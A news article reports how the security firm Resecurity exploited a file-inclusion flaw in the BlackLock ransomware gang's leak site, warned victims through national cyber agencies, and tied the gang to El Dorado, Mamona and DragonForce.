Security shop pwns ransomware gang, passes insider info to authorities

Here's one you don't see every day: A cybersecurity vendor is admitting to breaking into a notorious ransomware crew's infrastructure and gathering data it relayed to national agencies to help victims.

Resecurity said it contributed to the shuttering of the BlackLock ransomware gang's website last week after it found, and subsequently popped, a vulnerability in its TOR-based data leak site (DLS) during the holiday season of 2024.

After finding "a certain misconfiguration" in BlackLock's website, it found clearnet IP addresses related to its hosting infrastructure, and then exploited a Local File Include (LFI) vulnerability to gather server-side data such as config files and, crucially, credentials.

"Resecurity invested substantial time in hash-cracking threat actors' accounts to take over the infrastructure," it said in a blog post.

Among the data gathered was a history of commands entered over time by one of BlackLock's main operators, known as "$$$," which included copy-and-pasted credentials and amounted to the gang's most significant OPSEC failure, in the US vendor's view. 

One of these pasted passwords was also reused across several other accounts managed by one of the operators, said the researchers, which opened up additional avenues for them to understand BlackLock's inner workings.

Resecurity highlighted how reliant the gang was on the popular clearnet file-sharing platform Mega, abusing it as part of its data exfiltration process.

The infoseccers said they found eight email accounts used by the group to access Mega, its client, and the rclone utility to transfer victim data from their system to Mega, and then to BlackLock's DLS.

At some point in time BlackLock was also using Mega as a method of backing up stolen data and in some cases installed the Mega client on victims' machines so data exfiltration seemed less fishy.

That was the case with one primary legal services provider in France, one of the victims Resecurity was able to alert two days prior to their data being published.

The cybersleuths used their access to understand when BlackLock was planning to leak its data and alerted CERT-FR and ANSSI, the French cybersecurity agency, which then informed the victim.

Resecurity said that less than a week earlier, it was able to give the same heads-up to a Canadian victim after sharing intelligence with the Canadian Centre for Cyber Security. The victim was told about the planned data leakage 13 days prior to the actual publication.

While the security company couldn't prevent attacks from happening, it was able to alert a few victims when the criminals planned to leak their data, allowing them to get their corporate comms in order, it said.

Attribution

All signs point to the BlackLock operating out of either Russia or China, if not both. Various pieces of evidence pointed to this, from the cybercrime forum posts/adverts written in both Russian and Chinese, to internal rules about not targeting BRICS alliance and CIS countries, to the main IP addresses associated with Mega accounts originating from Russia and China.

One Resecurity researcher said they were also able to speak with $$$ via Tox chat, the preferred messaging platform for ransomware crims, and was convincing enough to pass as a genuine cybercriminal, so much so that they successfully registered themselves as a gang affiliate. All the communications here were written in Russian.

Resecurity didn't comment on whether it was able to track down the real identity of $$$, but did link them to the El Dorado and Mamona groups based on Ramp forum posts and analysis of their DLSes.

"For example, following a successful attack against New River Electrical from Ohio, El Dorado Ransomware actors also targeted the College of Veterinary Medicine (Kansas State University) and the City of Pensacola (Florida), which later got published at BlackLock Ransomware DLS," it said.

"The web interface of El Dorado Ransomware DLS was different from BlackLock Ransomware's, but they shared an almost identical list of victims. This overlap may confirm a strong connection between these ransomware projects."

Other infosec researchers including staffers at Tripwire and BlackFog have previously said BlackLock, which launched late last year, was a rebrand of El Dorado which itself launched in March 2024.

$$$ launched Mamona as recently as March 11, 2025, although this was incredibly short-lived and last week's events affecting all three brands both add to the body of evidence linking them, as well as hinting at their future.

DragonForce takes over

A fourth ransomware brand relevant to this case is DragonForce, which has been around since 2023 and gained notoriety for targeting Saudi organizations.

As Resecurity noted, BlackLock's DLS was defaced ostensibly by DragonForce on March 19, with config files and internal chats leaked to its front page.

This could indicate that DragonForce found a similar, if not the exact same LFI vulnerability Resecurity used to compromise the gang, but exploited it a little more noisily than the cybersleuths.

However, there are multiple signs that DragonForce's apparent breach and defacement was perhaps a false flag operation, one carried out to hide the fact that $$$ potentially defected to DragonForce.

For starters, many of the code modules of BlackLock and DragonForce are identical, Resecurity said in a reverse engineering report.

On February 28, 2025, $$$ also alluded to a possible exit scenario in a Ramp forum post, and as Resecurity noted, shared no surprise about the defacement of the BlackLock DLS, nor that of the Mamona's website a day before.

"It is possible the actor was fully aware that his operations could be already compromised, so the silent "exit" from the previous project could be the most rational option," said Resecurity. 

"Notably, he has not indicated any anger toward DragonForce Ransomware representatives – opposite calling them "gentlemen," which may confirm these events could be coordinated between them."

The DLSes for both BlackLock and Mamona were quickly taken down after their respective defacements, and the engineers don't expect either brand to return. ®